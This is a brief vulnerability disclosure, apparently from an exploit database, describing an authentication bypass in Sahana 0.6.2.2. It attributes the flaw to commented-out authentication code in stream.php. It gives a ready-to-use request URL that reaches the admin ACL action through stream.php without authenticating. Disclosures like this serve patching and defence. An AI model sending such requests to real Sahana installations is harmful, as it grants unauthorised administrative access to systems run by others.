Sahana 0.6.2.2 authentication bypass

2010-03-23
ID: 66938
CVE: None
Download vulnerable application: None
Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.
1-4-2 (www01)